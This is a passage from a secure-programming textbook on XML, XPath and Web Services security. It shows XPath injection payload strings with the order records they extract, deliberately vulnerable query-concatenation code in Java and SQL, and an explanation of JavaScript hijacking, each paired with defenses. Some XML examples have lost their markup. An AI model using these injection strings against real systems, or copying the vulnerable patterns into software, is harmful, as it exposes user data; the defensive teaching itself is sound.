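        System.out.println(accepts("<foo>ok</foo>"));  // prints "true"
        System.out.println(accepts(hostile));          // prints "false"
    }
}
```

Refusing the DOCTYPE outright is only an option when the application does not rely on DTDs at all, for example when validation is done against an XML Schema.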
Continuing the OrderXMLHandler class begun in Example 10.2, a program can take charge of resolving its own entities by implementing the resolveEntity method, as shown in Example 10.4.

Example 10.4 A method for resolving external entities in OrderXMLHandler.

    public InputSource resolveEntity(String publicId, String systemId)
        throws SAXException {
      if (ORDER_DTD_SYSTEM_NAME.equals(systemId)) {
        try {
          // always serve the local copy of the DTD, never a remote one
          FileInputStream fis = new FileInputStream(PATH_TO_ORDER_DTD);
          return new InputSource(fis);
        } catch (FileNotFoundException e) {
          throw new SAXException("could not find DTD", e);
        }
      } else {
        throw new SAXException("request for unknown DTD");
      }
    }

This code is labeled as both good and bad. It’s good because it prevents external entity attacks. It’s bad because an attacker who completely controls the XML can still bypass validation by providing the DOCTYPE definition inline. The following document does just that: It will pass validation even though it contains an attacker-supplied price reduction.

    ]> Magic tricks for all ages 110.95 0.25 P. O. Box 510260 St. Louis, MO 63151-0260 USA

In the end, XML Schema gives all-around better control over validation than a DTD does. Although you might be able to create a secure system using DTD-based validation, XML Schema is both easier to use correctly and more powerful in terms of the properties that can be validated.

Keep Control of Document Queries

Grubbing around directly in XML tags can be tiresome. Languages such as XPath can take much of the tedium out of manipulating XML, but if attackers can control the contents of an XPath query, they could end up with more access than you intended to give them. This attack is known as XPath injection, and both the attack and the vulnerable code constructs look quite similar to SQL Injection.
Imagine an XML document that contains a set of ice cream orders:

    strawberry vanilla chocolate chocolate

You might like to write a program that allows someone to look up an ice cream order. If a user can provide the order number and the last name that goes with it, the program should show the correct order. You could write code to directly traverse this XML and search for an order that matches the given parameters, but the code wouldn’t be much fun to write, and it would have little bits of the document schema sprinkled throughout, making it pretty much impossible to reuse and potentially more difficult to maintain. Instead, you could use an XPath query to do the work, as shown in Example 10.5.

Example 10.5 Using XPath to look up ice cream orders.

    public String flavorQuery(String id, String name, String xmlFile)
        throws XPathExpressionException {
      XPathFactory xfac = XPathFactory.newInstance();
      XPath xp = xfac.newXPath();
      InputSource input = new InputSource(xmlFile);
      // user-supplied values are concatenated straight into the query
      String query = "//order[@name='" + name + "' and @id='" + id + "']";
      return xp.evaluate(query, input);
    }

It’s brief, and the knowledge about the schema is centralized in the one statement that assembles the query. This approach will work just fine in simple cases. Set name to Davis and id to 0423, and the XPath query will be this:

    //order[@name='Davis' and @id='0423']

And flavorQuery() will return strawberry, as expected.

By now, we’re sure you see the injection attack coming from a mile away. If the input to flavorQuery() is not properly validated, attackers can read whatever they like from the XML without having to know any order numbers or customer names. Try setting name to be empty ("") and id to be this:

    ' or .=//orders/order[2] and 'a' = 'a

The resulting XPath query is a bit convoluted:

    //order[@name='' and @id='' or .=//orders/order[2] and 'a' = 'a']

Let’s simplify it.
Start by replacing the tautological expression 'a'='a' with the literal true:

    //order[@name='' and @id='' or .=//orders/order[2] and true]

Now note that, in our sample XML document, the name and id attributes are always populated and never blank, so @name='' and @id='' will always evaluate to false.

    //order[false and false or .=//orders/order[2] and true]

As with most programming languages, the and operator has higher precedence than the or operator, so evaluate and operations first:

    //order[false or .=//orders/order[2]]

Now evaluate the or operator:

    //order[.=//orders/order[2]]

We are left with an XPath query that says “Match this order node if it happens to be the second child of an orders node.” And sure enough, now flavorQuery() returns vanilla. Attackers can use this technique to read every record from the document one at a time by changing the id field.

    Value of id                                  Result
    ' or .=//orders/order[1] and 'a' = 'a        strawberry
    ' or .=//orders/order[2] and 'a' = 'a        vanilla
    ' or .=//orders/order[3] and 'a' = 'a        chocolate
    ' or .=//orders/order[4] and 'a' = 'a        chocolate

Readers who are both familiar with XPath attacks and generally impatient might be asking why we can’t read all the order nodes out of the document in one fell swoop. The problem is that the call to XPath.evaluate() used in this example will return only the contents of a single node, not a list of nodes, so we need to make a separate query for each piece of data we want to retrieve.

Attackers aren’t limited to retrieving just the contents of the orders; they can access the names and IDs, too. The following value for the id parameter will return the name attribute of the first order tag:

    ' or .=//orders/order[1]]/@name['a'='a

Similarly, the following value for id will retrieve the id attribute of the first order tag:

    ' or .=//orders/order[1]]/@id['a'='a

Defending against XPath injection also bears a great deal of resemblance to defending against SQL injection.
Just as with SQL injection, the heart of the problem is that the program allows attackers to mix data and control logic. You could try to alter the parameter values to escape potentially dangerous characters, but anything you overlook will be trouble. A better approach is to make a clear distinction between data and control by using XPath variables. XPath variables take a little more setup to use than SQL bind variables require, but the setup can be captured in a small helper class, shown in Example 10.6.

Example 10.6 A helper class for binding XPath variables.

    public static class XPathBindVariables
        implements javax.xml.xpath.XPathVariableResolver {

      // maps bind-variable names to their values
      HashMap<String, Object> vMap = new HashMap<String, Object>();

      public void bindVar(String var, Object value) {
        vMap.put(var, value);
      }

      public Object resolveVariable(javax.xml.namespace.QName qName) {
        return vMap.get(qName.getLocalPart());
      }
    }

The XPathBindVariables class stores a map between the names of the bind variables and their values. The resolveVariable() method allows the class to implement the interface required to make the map accessible to the object that carries out the XPath query. The flavorQuery() method can now be rewritten to use XPath variables, as shown in Example 10.7. Lines that have changed are in bold.

Example 10.7 A rewritten version of flavorQuery avoids injection attacks by using XPath variables.

    public String flavorQuery(String id, String name, String xmlFile)
        throws XPathExpressionException {
      XPathFactory xfac = XPathFactory.newInstance();
      XPath xp = xfac.newXPath();
      InputSource input = new InputSource(xmlFile);
      XPathBindVariables bv = new XPathBindVariables();
      xp.setXPathVariableResolver(bv);
      bv.bindVar("ID", id);
      bv.bindVar("NAME", name);
      // the query text is now a constant; user data arrives only as variables
      String query = "//orders/order[@id=$ID and @name=$NAME]";
      return xp.evaluate(query, input);
    }

Now there is no need to trust (or to validate) the values of id and name.
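The contrast between the two styles of query can be checked with a small self-contained program. This is a sketch under assumptions rather than the book's code: XPathInjectionDemo and its two methods are hypothetical names, the document is held in memory, and every order other than Davis/0423 uses made-up id and name values. The concatenated query tests name before id, matching the expanded query shown in the attack walk-through.

```java
import java.io.StringReader;
import java.util.HashMap;
import java.util.Map;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathExpressionException;
import javax.xml.xpath.XPathFactory;
import org.xml.sax.InputSource;

public class XPathInjectionDemo {
    // Illustrative data; only the Davis/0423/strawberry order comes from the text.
    static final String ORDERS =
          "<orders>"
        + "<order id=\"0423\" name=\"Davis\">strawberry</order>"
        + "<order id=\"5281\" name=\"Singh\">vanilla</order>"
        + "<order id=\"7399\" name=\"Lopez\">chocolate</order>"
        + "</orders>";

    // Vulnerable style: user input becomes part of the query text.
    static String concatenated(String id, String name)
            throws XPathExpressionException {
        XPath xp = XPathFactory.newInstance().newXPath();
        String query = "//order[@name='" + name + "' and @id='" + id + "']";
        return xp.evaluate(query, new InputSource(new StringReader(ORDERS)));
    }

    // Safer style: constant query text, user input supplied as XPath variables.
    static String bound(String id, String name)
            throws XPathExpressionException {
        Map<String, Object> vars = new HashMap<>();
        vars.put("ID", id);
        vars.put("NAME", name);
        XPath xp = XPathFactory.newInstance().newXPath();
        xp.setXPathVariableResolver(q -> vars.get(q.getLocalPart()));
        return xp.evaluate("//orders/order[@id=$ID and @name=$NAME]",
                           new InputSource(new StringReader(ORDERS)));
    }

    public static void main(String[] args) throws Exception {
        String attack = "' or .=//orders/order[2] and 'a' = 'a";
        System.out.println(concatenated("0423", "Davis")); // strawberry
        System.out.println(concatenated(attack, ""));      // vanilla
        System.out.println(bound("0423", "Davis"));        // strawberry
        System.out.println("[" + bound(attack, "") + "]"); // [] (no match)
    }
}
```

With bound variables the attack string is compared against the id attribute as plain text, so it matches nothing and the query returns an empty string.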
Regardless of the values, the query will carry out the expected logic.

10.2 Using Web Services

The most cynical among the software security crowd see Web Services as nothing more than a way to bypass the restrictions firewalls impose. In the bad old days, administrators could use a firewall to regulate network applications by controlling which ports were open to the outside world. This worked because most applications communicated on different ports. (Firewall rules could specify that inbound SMTP is okay, but no Telnet, and certainly no speaking the Network File System (NFS) protocol with the Internet at large.) Because all Web Services traffic can easily flow over port 80, there is no need to go talk to the network administrator to introduce a new application. We stop short of accusing anyone of harboring ulterior motives, but it is certainly true that uttering “Web Services” is the tersest verbiage one might use to explain why installing a firewall is an insufficient security plan.

Proponents of Web Services are certainly aware that security is a concern, but they often fall into the trap of equating security features with secure features. In this vein, a favorite excuse for an otherwise insecure Web Services implementation is the use of the WS-* family of standards, which were created to address security features such as authentication, authorization, encryption, and digital signatures. Specialized software (and hardware) exists to broker Web Services transactions to make all these details easy for the application developer. Of course, even if all the security features are done right, there is still plenty of room for security mishaps in the form of defects and surprises buried in the code that has been Web Service–enabled. In keeping with the theme of the book, we do not discuss Web Services security features. Instead, we focus on all the security problems that occur in the code that isn’t focused on security.
Input Validation

Web Services frameworks try to make it as easy as possible to push a button and get a Web Service. Here’s how the Apache Axis project describes getting started in creating a SOAP-enabled Web Service [Axis, 2007].

Let’s say we have a simple class like the following:

    public class Calculator {
      public int add(int i1, int i2) {
        return i1 + i2;
      }

      public int subtract(int i1, int i2) {
        return i1 - i2;
      }
    }

How do we go about making this class available via SOAP? There are a couple of answers to that question, but we begin with the easiest way Axis provides to do this, which takes almost no effort at all!

JWS (Java Web Service) Files: Instant Deployment

OK, here’s step 1: copy the above .java file into your webapp directory, and rename it Calculator.jws. So you might do something like this:

    % copy /axis/Calculator.jws

Now for step 2…. Wait a minute, you’re done! You should now be able to access the service at the following URL (assuming your Axis web application is on port 8080): http://localhost:8080/axis/Calculator.jws.

So it’s easy to expose methods that might have previously been the “guts” of the application. But if those guts contain vulnerabilities that were previously mitigated by the outer layer of code, the system is now vulnerable. Consider Example 10.8. It’s a method taken from DionySOA, a project that advertises itself as a Reseller/Broker service platform built using SOA and Web Services. The method is exposed through a Web Service. (You get a hint that it might be externally accessible when you see that it throws java.rmi.RemoteException. Knowing for sure requires looking at the application’s configuration files.) The method contains a blatant SQL injection vulnerability. It concatenates a user-controlled parameter into a SQL query string and executes the query.
Although it is possible to make this kind of mistake without any Web Services in sight, we can’t help but believe that the Web Services setup made it easier to forget about input validation because it makes input arriving from a potentially untrusted source less obvious.

Example 10.8 SQL injection as a Web Service.

    public supplier.model.SupplierProduct[] searchName(
        java.lang.String in0) throws java.rmi.RemoteException {
      System.out.println("searchName("+in0+")");
      // in0 comes straight from the Web Service caller
      String query="SELECT * FROM products " + " WHERE name like '"+in0+"' ";
      return this.doSQL(query);
    }

Similarly, if a newly exposed method relies on another part of the application to perform access control checks, the Web Services interface can now bypass those checks, making it easy to lose track of the trust boundary.

There’s nothing fundamentally wrong with making it easy to create a Web Service, but creating a good Web Service is really not so easy. The Web Services frameworks we are aware of do not give a programmer any guidance about the security implications that might be involved in exposing the insides of a program.

WSDL Worries

WSDL stands for Web Services Description Language, a language for explaining how to access Web Services. Some Web Services frameworks automatically generate a WSDL file that includes a description for all the methods they expose. The advantage to publishing a WSDL file is that it makes your Web Services “discoverable”; other programs can automatically determine how to invoke your Web Services without requiring a programmer to interpret any documentation. The disadvantage to publishing a WSDL file is that it makes your Web Services “discoverable”; it provides attackers with a map of potential targets you have exposed. A publicly available WSDL file makes it easier for a fuzzing tool to attack your application. It makes it easy for a human to assess whether you have inadvertently exposed any methods that should have remained private.
(Imagine an attacker’s delight when he comes across a WSDL entry for the method makeMeTheAdminstrator().)

We recommend against publishing a WSDL file for all to see. Instead, share the WSDL file only with people you trust. Hiding your WSDL file won’t make your Web Services secure, but it could force your attackers to work a bit harder.

Over Exposure

Web Services frameworks are driven by one or more configuration files that bind requests from the network to the objects and methods in the program. If the configuration and the code get out of sync, the program could expose more functionality than it should.

Direct Web Remoting (DWR) is a popular Java framework for writing Asynchronous JavaScript and XML (Ajax) applications. DWR makes it easy for programmers to access server-side Java from client-side JavaScript code. Consider the DWR configuration file in Example 10.9. You can see that it exposes a class named AccountDAO and specifically excludes the method setOwner from being remotely accessible. What you can’t see is that DWR has implemented a blacklist. As soon as one <exclude> tag is present, any method that isn’t explicitly forbidden becomes remotely accessible. Using exclusion tags, every time a programmer writes a method, he must remember to consider the implications of exposing the method. You can use <include> tags instead, in which case DWR will build a whitelist. That’s good, but if you don’t specify any <include> tags or any <exclude> tags, DWR defaults to exposing everything. It’s a configuration disaster waiting to happen. Our understanding is that the DWR team recognizes this problem and is planning to address it in a future release.

Example 10.9 DWR forces administrators to create a blacklist of methods that should not be exposed. Uh-oh.

    ...
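The practical difference between a blacklist and a whitelist shows up as soon as the code changes without the configuration changing. The following sketch models that situation with plain Java reflection. It is not DWR code and does not reflect how DWR is implemented: ExposureListsDemo, its nested AccountDAO stand-in, and the getBalance() and deleteAccount() methods are all hypothetical.

```java
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.Collections;
import java.util.Set;
import java.util.TreeSet;

public class ExposureListsDemo {

    // Hypothetical stand-in for the AccountDAO class named in the configuration.
    public static class AccountDAO {
        public String getBalance(String accountId) { return "0.00"; }
        public void setOwner(String accountId, String owner) { }
        // Added later by a programmer who never touched the configuration.
        public void deleteAccount(String accountId) { }
    }

    // Blacklist: every public method is exposed unless it is named in 'denied'.
    static Set<String> exposedWithDenyList(Class<?> c, Set<String> denied) {
        Set<String> exposed = new TreeSet<>();
        for (Method m : c.getDeclaredMethods()) {
            if (Modifier.isPublic(m.getModifiers()) && !m.isSynthetic()
                    && !denied.contains(m.getName())) {
                exposed.add(m.getName());
            }
        }
        return exposed;
    }

    // Whitelist: a public method is exposed only if it is named in 'allowed'.
    static Set<String> exposedWithAllowList(Class<?> c, Set<String> allowed) {
        Set<String> exposed = new TreeSet<>();
        for (Method m : c.getDeclaredMethods()) {
            if (Modifier.isPublic(m.getModifiers()) && !m.isSynthetic()
                    && allowed.contains(m.getName())) {
                exposed.add(m.getName());
            }
        }
        return exposed;
    }

    public static void main(String[] args) {
        System.out.println(exposedWithDenyList(
            AccountDAO.class, Collections.singleton("setOwner")));
        // prints "[deleteAccount, getBalance]"
        System.out.println(exposedWithAllowList(
            AccountDAO.class, Collections.singleton("getBalance")));
        // prints "[getBalance]"
    }
}
```

Under the blacklist, the newly added deleteAccount() method becomes remotely reachable by default; under the whitelist, it stays private until someone deliberately lists it.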
Static Analysis: Find the Entry Points

Static analysis tools should taint input parameters to methods that can be invoked through Web Service calls; these are methods that an attacker can control. For DWR, this means parsing the DWR configuration file and turning <create> tags into entry point rules. For the DWR configuration in Example 10.9, a static analysis tool should infer this rule:

    Entry point rule:
      Method: all methods in AccountDAO except setOwner()
      Precondition: All method arguments are tainted

New Opportunities for Old Errors

As with almost any new style of programming, Web Services make it possible for programmers to rediscover old errors. For example, some Web Services containers automatically include a stack trace as part of a failure message unless they are specifically configured not to do so; you can see examples of this in the “Error Handling” section of Chapter 9, “Web Applications.” Or programmers might rediscover the need for session management and once again fall into all the session management traps also covered in Chapter 9.

The situation is exacerbated by the fact that the security requirements for a Web Service are often ambiguous. Web Services are supposed to be flexible so that other programmers can use them to assemble applications that the creator of the Web Service might not have envisioned, but this makes it difficult for a Web Service to understand the security needs of its callers. What sort of output validation should a Web Service perform? If the Web Service is intended to be used directly by a Web browser, it should take precautions to prevent cross-site scripting. But if the author of a Web Service doesn’t know how it will be used, it’s hard to make the right security decisions.

JavaScript Hijacking: A New Frontier2

2. This section began as a white paper co-authored with Yekaterina Tsipenyuk O’Neil.

From a server’s perspective, Ajax Web applications make a Web browser look like a Web Services client. Instead of the Web browser requesting entire HTML pages, the browser makes a set of requests for smaller and more specific pieces of information. These requests look much like Web Services calls. Without making an effort to prevent it, many Ajax implementations leave the door open for attackers to steal data using these calls: we term this attack JavaScript hijacking.

The X in Ajax is a bit deceptive. Instead of XML, a large number of Ajax applications communicate using JavaScript syntax, the most popular form of which is JavaScript Object Notation (JSON). Unless they implement specific countermeasures against it, many Web applications that transport data using JavaScript syntax allow attackers to read confidential data using a technique similar to the one commonly used to create mash-ups.

Normally, Web browsers enforce the Same Origin Policy in order to protect the confidentiality of user data. The Same Origin Policy requires that, in order for JavaScript to access the contents of a Web page, both the JavaScript and the Web page must originate from the same domain. Without the Same Origin Policy, a malicious website could serve up JavaScript that loads sensitive information from other websites using a client’s credentials, cull through it, and communicate it back to an attacker.

JavaScript hijacking allows the attacker to bypass the Same Origin Policy in the case that a Web application serves up JavaScript to communicate confidential information. The loophole in the Same Origin Policy is that it allows JavaScript from any website to be included and executed in the context of any other website. Even though a malicious site cannot directly examine any data loaded from a vulnerable site on the client, it can still take advantage of this loophole by setting up an environment that allows it to witness the execution of the JavaScript and any relevant side effects it may have.
This is not a problem for non-Ajax web sites because they generally don’t communicate confidential data in JavaScript.

The code in Example 10.10 implements the client-side of a legitimate JSON interaction from a Web application designed to manage sales leads. (Note that this example is written for Mozilla-based browsers.)

Example 10.10 JavaScript client that requests data from a server and evaluates the result as JSON.

    var object;
    var req = new XMLHttpRequest();
    req.open("GET", "/object.json",true);
    req.onreadystatechange = function () {
      if (req.readyState == 4) {
        var txt = req.responseText;
        // evaluate the response text as a JavaScript expression
        object = eval("(" + txt + ")");
        req = null;
      }
    };
    req.send(null);

When the code runs, it generates an HTTP request that looks like this (we have elided HTTP headers that are not directly relevant to this explanation):

    GET /object.json HTTP/1.1
    ...
    Host:
    Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR

The server responds with an array in JSON format:

    HTTP/1.1 200 OK
    Cache-control: private
    Content-Type: text/javascript; charset=utf-8
    ...
    [{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
      "purchases":60000.00, "email":"" },
     {"fname":"Jacob", "lname":"West", "phone":"6502135600",
      "purchases":45000.00, "email":"" }]

In this case, the JSON contains a list of confidential sales leads associated with the current user. Other users cannot access this information without knowing the user’s session identifier. However, if a victim visits a malicious site, the malicious site can retrieve the information using JavaScript hijacking.

Example 10.11 shows malicious code that an attacker could use to steal the sensitive lead information intended for the client in Example 10.10. (Note that this code is also specific to Mozilla-based browsers. Other mainstream browsers do not allow native constructors to be overridden when objects are created without the use of the new operator.)
If a victim can be tricked into visiting a Web page that contains this malicious code, the victim’s lead information will be sent to the attacker.

Example 10.11 Malicious code that mounts a JavaScript hijacking attack against the application referenced in Example 10.10.

The last line of malicious code uses a script tag to include the JSON object in the current page. The Web browser will send up the appropriate session cookie with this script request. In other words, this request will be handled just as though it had originated from the legitimate application.

When the JSON arrives on the client, it will be evaluated in the context of the malicious page. This attack will fail if the top-level JSON data structure is an object instead of an array because stand-alone object declarations do not parse as valid JavaScript. However, attacks are not limited to JSON. Any data transported in a notation that parses as valid JavaScript can be vulnerable.

In order to witness the evaluation of the JSON, the malicious page has redefined the JavaScript function used to create new objects. In this way, the malicious code has inserted a hook that allows it to get access to the creation of each object and transmit the object’s contents back to the malicious site. Other techniques for intercepting sensitive data have also proven successful. Jeremiah Grossman overrode the default constructor for arrays to demonstrate an exploit for one of the first widely-discussed JavaScript hijacking vulnerabilities, which he discovered in a Google application [Grossman, 2006].

First-generation Web applications are not vulnerable to JavaScript hijacking, because they typically transmit data in HTML documents, not as pure JavaScript.
If a Web application contains an exploitable cross-site scripting vulnerability, it cannot defeat data stealing attacks such as JavaScript hijacking, because cross-site scripting allows an attacker to run JavaScript as though it originated from the vulnerable application’s domain. The inverse does not hold: if a Web application does not contain any cross-site scripting vulnerabilities, it is not necessarily safe from JavaScript hijacking.

For Web 2.0 applications that handle confidential data, there are two fundamental ways to defend against JavaScript hijacking:

• Decline malicious requests
• Prevent direct execution of the JavaScript response

The best way to defend against JavaScript hijacking is to adopt both defensive tactics.

Declining Malicious Requests

From the server’s perspective, a JavaScript hijacking attack looks like an attempt at cross-site request forgery, and defenses against cross-site request forgery will also defeat JavaScript hijacking attacks. In order to make it easy to detect malicious requests, include a parameter that is hard for an attacker to guess in every request. One way to accomplish this is to add the session cookie as a request parameter, as shown in Example 10.12. When the server receives such a request, it can check to be certain the session identifier matches the value in the request parameter. Malicious code does not have access to the session cookie (cookies are also subject to the Same Origin Policy), so there is no easy way for the attacker to craft a request that will pass this test. A different secret can also be used in place of the session cookie. As long as the secret is hard to guess and appears in a context that is accessible to the legitimate application and not accessible from a different domain, it will prevent an attacker from making a valid request.

Example 10.12 JavaScript code that submits the session cookie as a request parameter with an HTTP request.
    var httpRequest = new XMLHttpRequest();
    ...
    // send the cookie value in the request body so the server can compare it
    var cookies="cookies="+escape(document.cookie);
    httpRequest.open('POST', url, true);
    httpRequest.send(cookies);

Alternate approaches for declining malicious requests include checking the HTTP referer header and not responding to GET requests. Historically, the referer header has not been reliable, so we do not recommend using it as the basis for any security mechanisms. Not responding to GET requests is a defensive technique because the